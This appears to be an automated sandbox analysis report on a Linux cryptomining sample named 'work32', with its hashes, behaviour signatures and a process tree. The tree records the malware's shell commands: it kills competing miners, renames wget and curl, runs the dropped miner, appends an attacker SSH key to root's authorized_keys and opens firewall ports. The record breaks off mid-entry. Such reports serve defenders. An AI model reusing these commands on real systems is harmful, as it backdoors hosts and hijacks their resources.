Analysis

  • max time kernel
    48s
  • max time network
    51s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    03/12/2024, 23:54

General

  • Target

    work32

  • Size

    4.2MB

  • MD5

    06e1f988471336d788da0fcaa29ed50b

  • SHA1

    2fa461cd8f0614dfb86f845aef47c42910370b00

  • SHA256

    7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e

  • SHA512

    4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180

  • SSDEEP

    98304:Wr3wZHTOxuXKMHQOdgK6a4mR3chE+Agclmvj2iw+w:WbwZDXDHQOdg0Bo6l

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Adds new SSH keys 1 TTPs 2 IoCs

    Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

  • Contacts a large (1879) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Patched UPX-packed file 2 IoCs

    Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicates whether the system is a virtual machine.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 2 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system information such as serial numbers, manufacturer names, etc.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 38 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 56 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/work32
    /tmp/work32
    1⤵
    • Enumerates kernel/hardware configuration
    PID:1596
    • /tmp/work32
      /tmp/work32 -deamon
      2⤵
      • Creates/modifies Cron job
      • Enumerates kernel/hardware configuration
      • Writes file to tmp directory
      PID:1601
      • /usr/bin/sh
        sh -c "ps -ef | grep Circle_MI | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1618
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1621
        • /usr/bin/grep
          grep Circle_MI
          4⤵
          PID:1620
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1622
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1623
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1624
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1624
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1624
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1624
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1619
      • /usr/bin/sh
        sh -c "ps -ef | grep kworker34 | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1625
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1628
        • /usr/bin/grep
          grep kworker34
          4⤵
          PID:1627
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1629
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1630
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1631
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1631
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1631
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1631
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1626
      • /usr/bin/sh
        sh -c "ps -ef | grep .daemond | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1632
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1635
        • /usr/bin/grep
          grep .daemond
          4⤵
          PID:1634
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1633
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1636
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1637
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1638
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1638
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1638
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1638
      • /usr/bin/sh
        sh -c "ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1639
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1644
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1645
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1645
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1645
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1645
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1643
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1642
        • /usr/bin/grep
          grep /tmp/thisxxs
          4⤵
          PID:1641
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1640
      • /usr/bin/sh
        sh -c "ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1646
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1651
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1652
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1652
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1652
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1652
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1650
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1649
        • /usr/bin/grep
          grep /opt/yilu/work/xig/xig
          4⤵
          PID:1648
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1647
      • /usr/bin/sh
        sh -c "ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1653
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1658
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1659
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1659
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1659
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1659
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1657
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1656
        • /usr/bin/grep
          grep /opt/yilu/mservice
          4⤵
          PID:1655
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1654
      • /usr/bin/sh
        sh -c "ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1660
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1663
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1664
        • /usr/bin/grep
          grep /usr/bin/.sshd
          4⤵
          PID:1662
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1665
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1666
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1666
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1666
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1666
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1661
      • /usr/bin/sh
        sh -c "ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
        PID:1667
        • /usr/bin/xargs
          xargs kill -9
          4⤵
          PID:1672
          • /usr/local/sbin/kill
            kill -9
            5⤵
            PID:1673
          • /usr/local/bin/kill
            kill -9
            5⤵
            PID:1673
          • /usr/sbin/kill
            kill -9
            5⤵
            PID:1673
          • /usr/bin/kill
            kill -9
            5⤵
            • Reads CPU attributes
            PID:1673
        • /usr/bin/awk
          awk "{print \$2}"
          4⤵
          PID:1671
        • /usr/bin/grep
          grep -v grep
          4⤵
          PID:1670
        • /usr/bin/grep
          grep /usr/bin/bsd-port/getty
          4⤵
          PID:1669
        • /usr/bin/ps
          ps -ef
          4⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1668
      • /usr/bin/sh
        sh -c "ps -ef | grep x86_ | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
                                                                                                                                          PID:1674
                                                                                                                                          • /usr/bin/xargs
                                                                                                                                            xargs kill -9
                                                                                                                                            4⤵
                                                                                                                                              PID:1679
                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                kill -9
                                                                                                                                                5⤵
                                                                                                                                                  PID:1680
                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                  kill -9
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1680
                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                    kill -9
                                                                                                                                                    5⤵
                                                                                                                                                      PID:1680
                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                      kill -9
                                                                                                                                                      5⤵
                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                      PID:1680
                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1678
                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                      grep -v grep
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1677
                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                        grep x86_
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1676
                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                          ps -ef
                                                                                                                                                          4⤵
                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1675
                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                        sh -c "ps -ef | grep cryptonight | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1681
                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                            xargs kill -9
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1686
                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                kill -9
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1687
                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                  kill -9
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:1687
                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                    kill -9
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1687
                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                      kill -9
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                      PID:1687
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1685
                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                      grep -v grep
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1684
                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                        grep cryptonight
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1683
                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                          ps -ef
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:1682
                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                        sh -c "ps -ef | grep ddg | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1688
                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                            xargs kill -9
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1693
                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                kill -9
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:1694
                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                  kill -9
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:1694
                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                    kill -9
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1694
                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                      kill -9
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                      PID:1694
                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1692
                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1691
                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                        grep ddg
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1690
                                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                                          ps -ef
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                          PID:1689
                                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                                        sh -c "ps -ef | grep prohash | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1695
                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                            xargs kill -9
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1700
                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                kill -9
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1701
                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:1701
                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1701
                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                      PID:1701
                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                                    4⤵
      PID:1699
    • /usr/bin/grep
      grep -v grep
      4⤵
      PID:1698
    • /usr/bin/grep
      grep prohash
      4⤵
      PID:1697
    • /usr/bin/ps
      ps -ef
      4⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1696
• /usr/bin/sh
  sh -c "ps -ef | grep monero | grep -v grep | awk '{print \$2}' | xargs kill -9"
  3⤵
  PID:1702
    • /usr/bin/xargs
      xargs kill -9
      4⤵
      PID:1707
        • /usr/local/sbin/kill
          kill -9
          5⤵
          PID:1708
        • /usr/local/bin/kill
          kill -9
          5⤵
          PID:1708
        • /usr/sbin/kill
          kill -9
          5⤵
          PID:1708
        • /usr/bin/kill
          kill -9
          5⤵
          • Reads CPU attributes
          PID:1708
    • /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:1706
    • /usr/bin/grep
      grep -v grep
      4⤵
      PID:1705
    • /usr/bin/grep
      grep monero
      4⤵
      PID:1704
    • /usr/bin/ps
      ps -ef
      4⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1703
• /usr/bin/sh
  sh -c "ps -ef | grep xmr | grep -v grep | awk '{print \$2}' | xargs kill -9"
  3⤵
  PID:1709
    • /usr/bin/xargs
      xargs kill -9
      4⤵
      PID:1714
        • /usr/local/sbin/kill
          kill -9
          5⤵
          PID:1715
        • /usr/local/bin/kill
          kill -9
          5⤵
          PID:1715
        • /usr/sbin/kill
          kill -9
          5⤵
          PID:1715
        • /usr/bin/kill
          kill -9
          5⤵
          • Reads CPU attributes
          PID:1715
    • /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:1713
    • /usr/bin/grep
      grep -v grep
      4⤵
      PID:1712
    • /usr/bin/grep
      grep xmr
      4⤵
      • Reads runtime system information
      PID:1711
    • /usr/bin/ps
      ps -ef
      4⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1710
• /usr/bin/sh
  sh -c "ps -ef | grep miner | grep -v grep | awk '{print \$2}' | xargs kill -9"
  3⤵
  PID:1716
    • /usr/bin/xargs
      xargs kill -9
      4⤵
      • Reads runtime system information
      PID:1721
        • /usr/local/sbin/kill
          kill -9
          5⤵
          PID:1722
        • /usr/local/bin/kill
          kill -9
          5⤵
          PID:1722
        • /usr/sbin/kill
          kill -9
          5⤵
          PID:1722
        • /usr/bin/kill
          kill -9
          5⤵
          • Reads CPU attributes
          PID:1722
    • /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:1720
    • /usr/bin/grep
      grep -v grep
      4⤵
      PID:1719
    • /usr/bin/grep
      grep miner
      4⤵
      PID:1718
    • /usr/bin/ps
      ps -ef
      4⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1717
• /usr/bin/sh
  sh -c "ps -ef | grep pool. | grep -v grep | awk '{print \$2}' | xargs kill -9"
  3⤵
  PID:1723
    • /usr/bin/xargs
      xargs kill -9
      4⤵
                                                                                                                                                                                                                                                          PID:1728
                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:1729
                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:1729
                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:1729
                                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                  PID:1729
                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:1727
                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1726
                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                    grep pool.
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1725
                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                    sh -c "ps -ef | grep tcp: | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:1730
                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1735
                                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:1736
                                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1736
                                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:1736
                                                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                  PID:1736
                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1734
                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1733
                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                    grep tcp:
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                      PID:1731
                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                    sh -c "ps -ef | grep stratum | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1737
                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:1742
                                                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:1743
                                                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:1743
                                                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:1743
        • /usr/bin/kill
          kill -9
          5⤵
          • Reads CPU attributes
          PID:1743
    • /usr/bin/awk
      awk "{print \$2}"
      4⤵
      PID:1741
    • /usr/bin/grep
      grep -v grep
      4⤵
      PID:1740
    • /usr/bin/grep
      grep stratum
      4⤵
      PID:1739
    • /usr/bin/ps
      ps -ef
      4⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1738
• /usr/bin/sh
  sh -c "killall xmr"
  3⤵
  PID:1744
    • /usr/bin/killall
      killall xmr
      4⤵
      • Reads runtime system information
      PID:1745
• /usr/bin/sh
  sh -c "mv /usr/bin/wget /usr/bin/wget1&"
  3⤵
  PID:1746
• /usr/bin/sh
  sh -c "mv /usr/bin/curl /usr/bin/curl1&"
  3⤵
  PID:1748
• /usr/bin/sh
  sh -c "chmod +x /tmp/xmr"
  3⤵
  • File and Directory Permissions Modification
  PID:1750
    • /usr/bin/chmod
      chmod +x /tmp/xmr
      4⤵
      • File and Directory Permissions Modification
      PID:1751
• /usr/bin/sh
  sh -c /tmp/xmr
  3⤵
  PID:1752
    • /tmp/xmr
      /tmp/xmr
      4⤵
      • Executes dropped EXE
      • Checks hardware identifiers (DMI)
      • Reads hardware information
      • Checks CPU configuration
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      PID:1753
• /usr/bin/sh
  sh -c "chmod +x /tmp/secure.sh"
  3⤵
  • File and Directory Permissions Modification
  PID:1755
    • /usr/bin/chmod
      chmod +x /tmp/secure.sh
      4⤵
      • File and Directory Permissions Modification
      PID:1757
• /usr/bin/sh
  sh -c "/tmp/secure.sh&"
  3⤵
  PID:1759
• /usr/bin/sh
  sh -c "chmod +x /tmp/auth.sh"
  3⤵
  • File and Directory Permissions Modification
  PID:1763
    • /usr/bin/chmod
      chmod +x /tmp/auth.sh
      4⤵
      • File and Directory Permissions Modification
      PID:1765
• /usr/bin/sh
  sh -c "/tmp/auth.sh&"
  3⤵
  PID:1767
• /usr/bin/sh
  sh -c "mkdir -p /usr/.work"
  3⤵
  PID:1770
    • /usr/bin/mkdir
      mkdir -p /usr/.work
      4⤵
      PID:1777
• /usr/bin/sh
  sh -c "\\cp -R /tmp/* /usr/.work/ &"
  3⤵
  PID:1779
• /usr/bin/sh
  sh -c "chmod 700 /root/.ssh/"
  3⤵
  PID:1783
    • /usr/bin/chmod
      chmod 700 /root/.ssh/
      4⤵
      PID:1790
• /usr/bin/sh
  sh -c "echo >> /root/.ssh/authorized_keys"
  3⤵
  • Adds new SSH keys
                                                                                                                                                                                                                                                                                                                          PID:1791
                                                                                                                                                                                                                                                                                                                        • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                          sh -c "chmod 600 /root/.ssh/authorized_keys"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1793
                                                                                                                                                                                                                                                                                                                            • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                              chmod 600 /root/.ssh/authorized_keys
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:1794
                                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                              sh -c "echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Adds new SSH keys
                                                                                                                                                                                                                                                                                                                              PID:1795
                                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                              sh -c "iptables -I INPUT -p tcp --dport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:1796
                                                                                                                                                                                                                                                                                                                              • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                sh -c "iptables -I OUTPUT -p tcp --sport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                PID:1797
                                                                                                                                                                                                                                                                                                                              • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                sh -c "iptables -I PREROUTING -t nat -p tcp --dport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:1798
                                                                                                                                                                                                                                                                                                                                • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                  sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                  PID:1799
                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                  sh -c "iptables -I INPUT -p udp --dport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                    sh -c "ulimit -n"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:1801
                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                      sh -c "iptables -I OUTPUT -p udp --sport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                      PID:1803
                                                                                                                                                                                                                                                                                                                                    • /bin/sh
